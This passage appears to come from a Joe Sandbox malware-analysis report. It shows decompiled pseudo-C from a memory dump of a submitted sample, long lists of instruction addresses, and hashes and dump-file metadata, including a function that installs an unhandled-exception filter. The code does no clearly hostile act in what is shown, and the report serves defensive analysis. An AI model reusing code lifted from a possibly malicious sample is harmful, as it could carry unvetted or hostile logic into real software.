						_push(_t704);
						_push(_t582);
						_t573 = E00CD8C8D();
						__eflags = _t573;
						if(_t573 != 0) {
							__eflags = 0;
							 *0xcf3278( *((intOrPtr*)(_t582 + 0x6cb8)),  *((intOrPtr*)(_t582 + 0x6cbc)), 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t582 + 0x10))))();
							goto L17;
						}
						L13:
						E00CC6D83(0xd01098, 1);
						goto L14;
					} else {
						if( *(_t697 + 0x10ff) != 0) {
							E00CC7A0D(_t582, _t721,  *(_t697 + 8), _t582, _t697 + 0x1100);
						}
						goto L9;
					}
				}
				if( *((intOrPtr*)(__ecx + 0x67)) == 0) {
					goto L14;
				}
				_push(_t585);
				_push(0);
				_t704 = __ecx + 0x10;
				_push(_t704);
				_push(_t582);
				 *(_t721 - 0x20) = _t704;
				if(E00CD8C8D() == 0) {
					goto L13;
				} else {
					_t585 =  *(_t721 - 0x18);
					_t684 = 0;
					goto L5;
				}
			}
































































































                                                    0x00cc8493
                                                    0x00cc849d
                                                    0x00cc84a3
                                                    0x00cc84a6
                                                    0x00cc84aa
                                                    0x00cc84ac
                                                    0x00cc84b2
                                                    0x00cc84b9
                                                    0x00cc84bf
                                                    0x00cc84e0
                                                    0x00cc84e3
                                                    0x00cc84e6
                                                    0x00cc84e6
                                                    0x00cc84ef
                                                    0x00cc857a
                                                    0x00cc8580
                                                    0x00cc8586
                                                    0x00cc859e
                                                    0x00cc859e
                                                    0x00cc85a4
                                                    0x00cc85bc
                                                    0x00cc85bc
                                                    0x00cc85bf
                                                    0x00cc85c5
                                                    0x00cc85e2
                                                    0x00cc85e7
                                                    0x00cc85eb
                                                    0x00cc85f5
                                                    0x00cc8600
                                                    0x00cc8605
                                                    0x00cc8607
                                                    0x00cc860b
                                                    0x00cc860d
                                                    0x00cc860f
                                                    0x00cc8613
                                                    0x00cc8615
                                                    0x00cc8617
                                                    0x00cc8617
                                                    0x00cc8613
                                                    0x00cc861f
                                                    0x00cc8624
                                                    0x00cc8625
                                                    0x00cc8632
                                                    0x00cc8633
                                                    0x00cc863b
                                                    0x00cc8642
                                                    0x00cc8645
                                                    0x00cc869c
                                                    0x00cc86a1
                                                    0x00cc86a3
                                                    0x00cc86a5
                                                    0x00cc86ab
                                                    0x00cc86b1
                                                    0x00cc86b5
                                                    0x00cc86b5
                                                    0x00cc86b5
                                                    0x00cc86b5
                                                    0x00cc8647
                                                    0x00cc864a
                                                    0x00cc8650
                                                    0x00cc8652
                                                    0x00cc8654
                                                    0x00cc8658
                                                    0x00cc865a
                                                    0x00cc8661
                                                    0x00cc8666
                                                    0x00cc8667
                                                    0x00cc866e
                                                    0x00cc8673
                                                    0x00cc867d
                                                    0x00cc867f
                                                    0x00cc8695
                                                    0x00cc8681
                                                    0x00cc8683
                                                    0x00cc868a
                                                    0x00cc868c
                                                    0x00cc868c
                                                    0x00cc867f
                                                    0x00cc8658
                                                    0x00cc8652
                                                    0x00cc86be
                                                    0x00cc86c3
                                                    0x00cc86db
                                                    0x00cc86e6
                                                    0x00cc86ee
                                                    0x00cc86f1
                                                    0x00cc86f3
                                                    0x00cc86f5
                                                    0x00cc86f7
                                                    0x00cc86fa
                                                    0x00cc86fd
                                                    0x00cc8703
                                                    0x00cc8721
                                                    0x00cc8721
                                                    0x00cc8724
                                                    0x00cc873c
                                                    0x00cc873f
                                                    0x00cc8744
                                                    0x00cc874a
                                                    0x00cc874b
                                                    0x00cc874d
                                                    0x00cc8756
                                                    0x00cc8756
                                                    0x00cc8758
                                                    0x00cc875b
                                                    0x00cc8765
                                                    0x00cc876c
                                                    0x00cc8771
                                                    0x00cc8773
                                                    0x00cc8543
                                                    0x00cc8543
                                                    0x00cc8543
                                                    0x00cc8545
                                                    0x00cc854b
                                                    0x00cc8553
                                                    0x00cc8553
                                                    0x00cc8779
                                                    0x00cc877e
                                                    0x00cc8786
                                                    0x00cc8787
                                                    0x00cc878a
                                                    0x00cc8791
                                                    0x00cc8792
                                                    0x00cc8799
                                                    0x00cc879c
                                                    0x00cc87b3
                                                    0x00cc87b3
                                                    0x00cc87b6
                                                    0x00cc87b6
                                                    0x00cc87bb
                                                    0x00cc87be
                                                    0x00cc87c5
                                                    0x00cc87c6
                                                    0x00cc87c9
                                                    0x00cc87cc
                                                    0x00cc87d7
                                                    0x00cc87d7
                                                    0x00cc87da
                                                    0x00cc87e1
                                                    0x00cc87e1
                                                    0x00cc87e7
                                                    0x00cc87ee
                                                    0x00cc87ef
                                                    0x00cc87fd
                                                    0x00cc8802
                                                    0x00cc8804
                                                    0x00cc883c
                                                    0x00cc883f
                                                    0x00cc884b
                                                    0x00cc884b
                                                    0x00cc884b
                                                    0x00cc884e
                                                    0x00cc884e
                                                    0x00cc8858
                                                    0x00cc885d
                                                    0x00cc885f
                                                    0x00cc8883
                                                    0x00cc8883
                                                    0x00cc888a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc888c
                                                    0x00cc8896
                                                    0x00cc889b
                                                    0x00cc889d
                                                    0x00cc897f
                                                    0x00000000
                                                    0x00cc897f
                                                    0x00cc88a3
                                                    0x00cc88a6
                                                    0x00cc88b4
                                                    0x00cc88b5
                                                    0x00cc88b5
                                                    0x00cc88b7
                                                    0x00cc88b9
                                                    0x00cc88d5
                                                    0x00cc88df
                                                    0x00cc88e9
                                                    0x00cc88fb
                                                    0x00cc8900
                                                    0x00cc8907
                                                    0x00cc89a5
                                                    0x00cc89a5
                                                    0x00cc89a8
                                                    0x00cc89a8
                                                    0x00cc89ac
                                                    0x00cc89b2
                                                    0x00cc89b7
                                                    0x00cc89bd
                                                    0x00cc89c2
                                                    0x00cc89ca
                                                    0x00cc89cb
                                                    0x00cc89ce
                                                    0x00cc89d3
                                                    0x00cc89d4
                                                    0x00cc89d6
                                                    0x00cc8a5f
                                                    0x00cc8a61
                                                    0x00cc8a66
                                                    0x00cc8a68
                                                    0x00cc8ab6
                                                    0x00cc8ab9
                                                    0x00cc8abb
                                                    0x00cc8ad5
                                                    0x00cc8ad7
                                                    0x00cc8ad7
                                                    0x00cc8ad8
                                                    0x00cc8ad8
                                                    0x00cc8adf
                                                    0x00cc8b14
                                                    0x00cc8b16
                                                    0x00cc910c
                                                    0x00cc910c
                                                    0x00cc9110
                                                    0x00cc9116
                                                    0x00cc911b
                                                    0x00cc911f
                                                    0x00cc9122
                                                    0x00cc9125
                                                    0x00cc9127
                                                    0x00cc9127
                                                    0x00cc9127
                                                    0x00cc9127
                                                    0x00cc912d
                                                    0x00cc912d
                                                    0x00cc9131
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9137
                                                    0x00cc9139
                                                    0x00cc8576
                                                    0x00cc8576
                                                    0x00000000
                                                    0x00cc8576
                                                    0x00cc913f
                                                    0x00cc9145
                                                    0x00cc8513
                                                    0x00cc8515
                                                    0x00000000
                                                    0x00cc8515
                                                    0x00cc914b
                                                    0x00cc914d
                                                    0x00000000
                                                    0x00cc914d
                                                    0x00cc8b1c
                                                    0x00cc8b1c
                                                    0x00cc8b1f
                                                    0x00cc8b1f
                                                    0x00cc8b22
                                                    0x00cc8b29
                                                    0x00cc8b3b
                                                    0x00cc8b3b
                                                    0x00cc8b3e
                                                    0x00cc8b40
                                                    0x00cc8b87
                                                    0x00cc8b87
                                                    0x00cc8b8b
                                                    0x00cc8b8d
                                                    0x00cc8b95
                                                    0x00cc8b95
                                                    0x00cc8ba9
                                                    0x00cc8baf
                                                    0x00cc8bb5
                                                    0x00cc8bbb
                                                    0x00cc8bcc
                                                    0x00cc8be2
                                                    0x00cc8be7
                                                    0x00cc8bed
                                                    0x00cc8bf0
                                                    0x00cc8bf6
                                                    0x00cc8bf9
                                                    0x00cc8bfc
                                                    0x00cc8c03
                                                    0x00cc8c06
                                                    0x00cc8c0c
                                                    0x00cc8c11
                                                    0x00cc8c14
                                                    0x00cc8c16
                                                    0x00cc8c19
                                                    0x00cc8c1c
                                                    0x00cc8c1f
                                                    0x00cc8c22
                                                    0x00cc8c25
                                                    0x00cc8c27
                                                    0x00cc8cd6
                                                    0x00cc8cd6
                                                    0x00cc8cd9
                                                    0x00cc8ce0
                                                    0x00cc8ce7
                                                    0x00cc8ceb
                                                    0x00cc8d01
                                                    0x00cc8d01
                                                    0x00cc8d03
                                                    0x00cc8d06
                                                    0x00cc8d06
                                                    0x00cc8d0a
                                                    0x00cc8d0e
                                                    0x00cc8d12
                                                    0x00cc8e40
                                                    0x00cc8e47
                                                    0x00cc8e49
                                                    0x00cc8e50
                                                    0x00cc8e73
                                                    0x00cc8e74
                                                    0x00cc8e7a
                                                    0x00cc8e7f
                                                    0x00cc8e91
                                                    0x00cc8e97
                                                    0x00cc8e99
                                                    0x00cc8e9f
                                                    0x00cc8eb9
                                                    0x00cc8e52
                                                    0x00cc8e52
                                                    0x00cc8e58
                                                    0x00cc8e5e
                                                    0x00cc8e5f
                                                    0x00cc8e5f
                                                    0x00cc8e50
                                                    0x00cc8ebe
                                                    0x00cc8ec0
                                                    0x00cc8ec5
                                                    0x00cc8ecc
                                                    0x00cc8efe
                                                    0x00cc8efe
                                                    0x00cc8efe
                                                    0x00cc8f00
                                                    0x00cc8f02
                                                    0x00cc8f02
                                                    0x00cc8f09
                                                    0x00cc8f13
                                                    0x00cc8f1a
                                                    0x00cc8f39
                                                    0x00cc8f39
                                                    0x00cc8f3d
                                                    0x00cc8f40
                                                    0x00cc8f98
                                                    0x00cc8f98
                                                    0x00cc8f9c
                                                    0x00cc8f9f
                                                    0x00cc8fb2
                                                    0x00cc8fb2
                                                    0x00cc8fb2
                                                    0x00cc8fb4
                                                    0x00cc8fb4
                                                    0x00cc8fb8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8fbe
                                                    0x00cc8fc1
                                                    0x00cc8fc5
                                                    0x00cc8fd1
                                                    0x00cc8fd1
                                                    0x00cc8fd5
                                                    0x00cc8ff0
                                                    0x00cc8ff0
                                                    0x00cc8ff2
                                                    0x00cc9007
                                                    0x00cc9007
                                                    0x00cc9009
                                                    0x00cc90cd
                                                    0x00cc90cd
                                                    0x00cc90d0
                                                    0x00cc90d7
                                                    0x00cc90df
                                                    0x00cc90e6
                                                    0x00cc90eb
                                                    0x00cc90ed
                                                    0x00cc90f6
                                                    0x00cc9100
                                                    0x00cc9100
                                                    0x00cc90ed
                                                    0x00cc9105
                                                    0x00000000
                                                    0x00cc9105
                                                    0x00cc900f
                                                    0x00cc9014
                                                    0x00cc9016
                                                    0x00cc9019
                                                    0x00cc901f
                                                    0x00cc901f
                                                    0x00cc9021
                                                    0x00cc9033
                                                    0x00cc9033
                                                    0x00cc9039
                                                    0x00cc903e
                                                    0x00cc9047
                                                    0x00cc905b
                                                    0x00cc9062
                                                    0x00cc9075
                                                    0x00cc9077
                                                    0x00cc9080
                                                    0x00cc9085
                                                    0x00cc908b
                                                    0x00cc909a
                                                    0x00cc90ad
                                                    0x00cc90c0
                                                    0x00cc90c2
                                                    0x00cc90c5
                                                    0x00cc90ca
                                                    0x00000000
                                                    0x00cc90ca
                                                    0x00cc9023
                                                    0x00cc9029
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc902b
                                                    0x00cc9031
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9031
                                                    0x00cc901b
                                                    0x00cc901d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc901d
                                                    0x00cc8ff4
                                                    0x00cc8ff7
                                                    0x00cc8ffe
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9004
                                                    0x00000000
                                                    0x00cc9004
                                                    0x00cc8fd7
                                                    0x00cc8fd9
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8fdb
                                                    0x00cc8fe2
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8fe8
                                                    0x00cc8fea
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8fea
                                                    0x00cc8fc7
                                                    0x00cc8fcb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8fcb
                                                    0x00cc8fa1
                                                    0x00cc8fa8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8faa
                                                    0x00cc8fac
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8fae
                                                    0x00000000
                                                    0x00cc8fae
                                                    0x00cc8f42
                                                    0x00cc8f46
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8f48
                                                    0x00cc8f4a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8f4c
                                                    0x00cc8f52
                                                    0x00cc8f71
                                                    0x00cc8f71
                                                    0x00cc8f73
                                                    0x00cc8f73
                                                    0x00cc8f74
                                                    0x00cc8f80
                                                    0x00cc8f8c
                                                    0x00cc8f90
                                                    0x00cc8f95
                                                    0x00000000
                                                    0x00cc8f95
                                                    0x00cc8f54
                                                    0x00cc8f5a
                                                    0x00cc8f64
                                                    0x00cc8f64
                                                    0x00cc8f6b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8f6d
                                                    0x00000000
                                                    0x00cc8f6d
                                                    0x00cc8f5c
                                                    0x00cc8f62
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8f62
                                                    0x00cc8f1c
                                                    0x00cc8f22
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8f24
                                                    0x00cc8f2e
                                                    0x00cc8f2e
                                                    0x00cc8f30
                                                    0x00cc8f32
                                                    0x00cc8f32
                                                    0x00000000
                                                    0x00cc8f30
                                                    0x00cc8f26
                                                    0x00cc8f2c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8f2c
                                                    0x00cc8f0b
                                                    0x00000000
                                                    0x00cc8f0b
                                                    0x00cc8edd
                                                    0x00cc8eef
                                                    0x00cc8ef4
                                                    0x00cc8ef6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8ef8
                                                    0x00cc8efa
                                                    0x00000000
                                                    0x00cc8efa
                                                    0x00cc8d18
                                                    0x00cc8d1e
                                                    0x00cc8d21
                                                    0x00cc8d8a
                                                    0x00cc8d8a
                                                    0x00cc8d8f
                                                    0x00cc8d9c
                                                    0x00cc8d9d
                                                    0x00cc8da2
                                                    0x00cc8da7
                                                    0x00cc8dad
                                                    0x00cc8db0
                                                    0x00cc8db7
                                                    0x00cc8db8
                                                    0x00cc8dbd
                                                    0x00cc8dc0
                                                    0x00cc8dc2
                                                    0x00cc8e19
                                                    0x00cc8e19
                                                    0x00cc8e1c
                                                    0x00cc8e1c
                                                    0x00cc8e23
                                                    0x00cc8d57
                                                    0x00cc8d57
                                                    0x00cc8d59
                                                    0x00cc8e36
                                                    0x00cc8e36
                                                    0x00cc8e36
                                                    0x00cc8e38
                                                    0x00cc8e38
                                                    0x00000000
                                                    0x00cc8e38
                                                    0x00cc8d5f
                                                    0x00cc8d5f
                                                    0x00cc8d61
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8d67
                                                    0x00000000
                                                    0x00cc8d67
                                                    0x00cc8e29
                                                    0x00cc8e2b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8d53
                                                    0x00cc8d53
                                                    0x00000000
                                                    0x00cc8d53
                                                    0x00cc8dc4
                                                    0x00cc8dcc
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8dce
                                                    0x00cc8dd4
                                                    0x00cc8de0
                                                    0x00cc8de1
                                                    0x00cc8de4
                                                    0x00cc8dfa
                                                    0x00cc8dfb
                                                    0x00cc8e02
                                                    0x00cc8e07
                                                    0x00cc8e09
                                                    0x00cc8e0c
                                                    0x00cc8e0c
                                                    0x00cc8e0e
                                                    0x00cc8d50
                                                    0x00cc8d50
                                                    0x00000000
                                                    0x00cc8d50
                                                    0x00cc8e14
                                                    0x00000000
                                                    0x00cc8e14
                                                    0x00cc8de6
                                                    0x00cc8de9
                                                    0x00cc8dee
                                                    0x00cc8dee
                                                    0x00cc8df0
                                                    0x00000000
                                                    0x00cc8df0
                                                    0x00cc8d23
                                                    0x00cc8d26
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8d28
                                                    0x00cc8d2b
                                                    0x00cc8d6e
                                                    0x00cc8d6e
                                                    0x00cc8d70
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8d7c
                                                    0x00cc8d83
                                                    0x00000000
                                                    0x00cc8d83
                                                    0x00cc8d2d
                                                    0x00cc8d30
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8d32
                                                    0x00cc8d35
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8d44
                                                    0x00cc8d49
                                                    0x00cc8d4b
                                                    0x00cc8d4d
                                                    0x00000000
                                                    0x00cc8d4d
                                                    0x00cc8ced
                                                    0x00cc8cef
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8cf3
                                                    0x00cc8cf4
                                                    0x00cc8cf8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8cfa
                                                    0x00cc8cfc
                                                    0x00000000
                                                    0x00cc8cfc
                                                    0x00cc8c2d
                                                    0x00cc8c33
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8c39
                                                    0x00cc8c41
                                                    0x00cc8c47
                                                    0x00cc8c49
                                                    0x00cc8cd1
                                                    0x00cc8cd1
                                                    0x00cc8cd1
                                                    0x00cc8cd3
                                                    0x00000000
                                                    0x00cc8cd3
                                                    0x00cc8c4f
                                                    0x00cc8c59
                                                    0x00cc8c59
                                                    0x00cc8c69
                                                    0x00cc8c6c
                                                    0x00cc8c6e
                                                    0x00cc8cce
                                                    0x00cc8cce
                                                    0x00000000
                                                    0x00cc8cce
                                                    0x00cc8c70
                                                    0x00cc8c76
                                                    0x00cc8c76
                                                    0x00cc8c7a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8c7e
                                                    0x00cc8c80
                                                    0x00cc8ca5
                                                    0x00cc8cab
                                                    0x00cc8cb7
                                                    0x00cc8cc2
                                                    0x00cc8ccb
                                                    0x00000000
                                                    0x00cc8ccb
                                                    0x00cc8c82
                                                    0x00cc8c8c
                                                    0x00cc8c8e
                                                    0x00cc8c93
                                                    0x00cc8c99
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8c9b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8c9d
                                                    0x00cc8ca3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8ca3
                                                    0x00cc8c84
                                                    0x00cc8c8a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8c8a
                                                    0x00cc8c72
                                                    0x00cc8c74
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8c74
                                                    0x00cc8c51
                                                    0x00cc8c57
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8c57
                                                    0x00cc8b8f
                                                    0x00cc8b8f
                                                    0x00cc8b8f
                                                    0x00cc8b8f
                                                    0x00000000
                                                    0x00cc8b8f
                                                    0x00cc8b46
                                                    0x00cc8b49
                                                    0x00cc8b4a
                                                    0x00cc8b4d
                                                    0x00cc8b4f
                                                    0x00cc8b5a
                                                    0x00cc8b5c
                                                    0x00cc8b6b
                                                    0x00cc8b7d
                                                    0x00cc8b7d
                                                    0x00cc8b5c
                                                    0x00000000
                                                    0x00cc8b4d
                                                    0x00cc8b2b
                                                    0x00cc8b32
                                                    0x00cc8b39
                                                    0x00cc8b84
                                                    0x00000000
                                                    0x00cc8b84
                                                    0x00000000
                                                    0x00cc8b39
                                                    0x00cc8ae2
                                                    0x00cc8ae5
                                                    0x00cc8aec
                                                    0x00cc8af3
                                                    0x00cc8af8
                                                    0x00cc8afa
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8afc
                                                    0x00cc8afe
                                                    0x00cc8b01
                                                    0x00cc8b01
                                                    0x00cc8b07
                                                    0x00cc8b0c
                                                    0x00000000
                                                    0x00cc8b0c
                                                    0x00cc8abd
                                                    0x00cc8ac6
                                                    0x00cc8ac7
                                                    0x00cc8acc
                                                    0x00cc8ace
                                                    0x00cc8ad1
                                                    0x00cc8ad1
                                                    0x00cc8ad3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8ad3
                                                    0x00cc8a6a
                                                    0x00cc8a6e
                                                    0x00cc8a74
                                                    0x00cc8a77
                                                    0x00cc8a7b
                                                    0x00cc8a83
                                                    0x00cc8a84
                                                    0x00cc8a87
                                                    0x00cc8a8b
                                                    0x00cc8a8c
                                                    0x00cc8a8f
                                                    0x00cc8a91
                                                    0x00cc8a97
                                                    0x00cc8a9d
                                                    0x00cc8a9f
                                                    0x00cc8aa5
                                                    0x00cc8aac
                                                    0x00cc8aaf
                                                    0x00cc8aaf
                                                    0x00cc8a9d
                                                    0x00cc8a8f
                                                    0x00cc8a87
                                                    0x00cc8a7b
                                                    0x00000000
                                                    0x00cc8a6e
                                                    0x00cc89dc
                                                    0x00cc89df
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc89e1
                                                    0x00cc89e4
                                                    0x00cc89e6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc89ec
                                                    0x00cc89ef
                                                    0x00cc89f2
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc89f8
                                                    0x00cc89fb
                                                    0x00cc8a02
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8a0a
                                                    0x00cc8a11
                                                    0x00cc8a14
                                                    0x00cc8a19
                                                    0x00cc8a1b
                                                    0x00cc8a4c
                                                    0x00cc8a4c
                                                    0x00cc8a50
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8a56
                                                    0x00cc8a58
                                                    0x00cc8a5a
                                                    0x00000000
                                                    0x00cc8a5a
                                                    0x00cc8a1d
                                                    0x00cc8a21
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8a23
                                                    0x00cc8a2b
                                                    0x00cc8a2c
                                                    0x00cc8a2d
                                                    0x00cc8a33
                                                    0x00cc8a36
                                                    0x00cc8a3d
                                                    0x00cc8a42
                                                    0x00cc8a43
                                                    0x00cc8a44
                                                    0x00cc8a47
                                                    0x00000000
                                                    0x00cc8a47
                                                    0x00cc890d
                                                    0x00cc8914
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc891c
                                                    0x00cc8927
                                                    0x00cc892c
                                                    0x00cc892f
                                                    0x00cc8931
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8933
                                                    0x00cc893a
                                                    0x00cc893d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc893f
                                                    0x00cc8946
                                                    0x00cc8950
                                                    0x00cc8951
                                                    0x00cc898b
                                                    0x00cc898d
                                                    0x00cc8999
                                                    0x00cc89a0
                                                    0x00000000
                                                    0x00cc89a0
                                                    0x00cc8953
                                                    0x00cc8958
                                                    0x00cc8966
                                                    0x00cc896b
                                                    0x00cc896f
                                                    0x00cc8975
                                                    0x00cc8975
                                                    0x00cc8883
                                                    0x00cc8868
                                                    0x00cc886f
                                                    0x00cc8874
                                                    0x00cc887b
                                                    0x00000000
                                                    0x00cc887b
                                                    0x00cc880d
                                                    0x00cc8813
                                                    0x00cc8818
                                                    0x00cc881a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc881c
                                                    0x00cc8823
                                                    0x00cc8835
                                                    0x00cc8837
                                                    0x00000000
                                                    0x00cc8837
                                                    0x00cc8826
                                                    0x00cc882c
                                                    0x00cc8831
                                                    0x00cc8833
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8833
                                                    0x00cc87dc
                                                    0x00cc87df
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc87df
                                                    0x00cc87ce
                                                    0x00cc87d5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc87d5
                                                    0x00cc879e
                                                    0x00cc87a5
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc87a7
                                                    0x00cc87ab
                                                    0x00cc87b1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc87b1
                                                    0x00cc874f
                                                    0x00cc8752
                                                    0x00cc8754
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8754
                                                    0x00cc8726
                                                    0x00cc8726
                                                    0x00cc872c
                                                    0x00cc872f
                                                    0x00cc8732
                                                    0x00cc8734
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc873a
                                                    0x00cc873a
                                                    0x00000000
                                                    0x00cc873a
                                                    0x00cc8705
                                                    0x00cc8708
                                                    0x00cc870e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8710
                                                    0x00cc8716
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc871c
                                                    0x00000000
                                                    0x00cc871c
                                                    0x00cc85cd
                                                    0x00cc85d3
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc85d5
                                                    0x00cc85dc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc85dc
                                                    0x00cc85a6
                                                    0x00cc85b0
                                                    0x00cc85b0
                                                    0x00cc85b6
                                                    0x00000000
                                                    0x00cc85b6
                                                    0x00cc85a8
                                                    0x00cc85ae
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc85ae
                                                    0x00cc8588
                                                    0x00cc8592
                                                    0x00cc8592
                                                    0x00cc8598
                                                    0x00000000
                                                    0x00cc8598
                                                    0x00cc858a
                                                    0x00cc8590
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8590
                                                    0x00cc84f8
                                                    0x00cc851c
                                                    0x00cc851f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8521
                                                    0x00cc8528
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc852a
                                                    0x00cc852b
                                                    0x00cc852c
                                                    0x00cc852d
                                                    0x00cc852e
                                                    0x00cc8533
                                                    0x00cc8535
                                                    0x00cc8558
                                                    0x00cc856c
                                                    0x00cc8574
                                                    0x00000000
                                                    0x00cc8574
                                                    0x00cc8537
                                                    0x00cc853e
                                                    0x00000000
                                                    0x00cc84fa
                                                    0x00cc8501
                                                    0x00cc850e
                                                    0x00cc850e
                                                    0x00000000
                                                    0x00cc8501
                                                    0x00cc84f8
                                                    0x00cc84c4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc84c6
                                                    0x00cc84c7
                                                    0x00cc84c8
                                                    0x00cc84cb
                                                    0x00cc84cc
                                                    0x00cc84cd
                                                    0x00cc84d7
                                                    0x00000000
                                                    0x00cc84d9
                                                    0x00cc84d9
                                                    0x00cc84dc
                                                    0x00000000
                                                    0x00cc84dc

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 68defd8adcf2535e8033e50f6373c8160eea9dc2bfc65cdfd5d2643abcf1583a
                                                    • Instruction ID: 7c96fdd495a8cfb93c4b101d06abf84f789af1523dcd4e85a4bd20ff232e61cc
                                                    • Opcode Fuzzy Hash: 68defd8adcf2535e8033e50f6373c8160eea9dc2bfc65cdfd5d2643abcf1583a
                                                    • Instruction Fuzzy Hash: 9482F870904245AEDF15DB64C895FFBBBB9AF05300F0841BEE8599B282DB705B8DDB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDF9D5() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00CDF9F0); // executed
				return _t1;
			}




                                                    0x00cdf9da
                                                    0x00cdf9e0

                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0001F9F0,00CDF3A5), ref: 00CDF9DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
